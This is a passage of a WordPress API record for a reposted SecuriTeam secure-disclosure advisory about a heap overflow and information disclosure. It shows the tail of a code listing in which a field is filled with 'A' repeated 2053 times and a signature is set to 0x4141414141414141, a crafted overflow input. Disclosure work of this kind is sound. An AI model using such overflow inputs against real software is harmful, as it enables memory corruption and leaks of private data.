<\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;A&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">repeats<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">times<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244c4155423934-23\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">signature<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4141414141414141<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244c4155423934-24\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3494\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},
"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12357,12135,10757],"class_list":["post-10203","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-heap-overflow","tag-information-disclosure","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10203"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10203\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10203"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10203"}],"curies":[{"name"
:"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}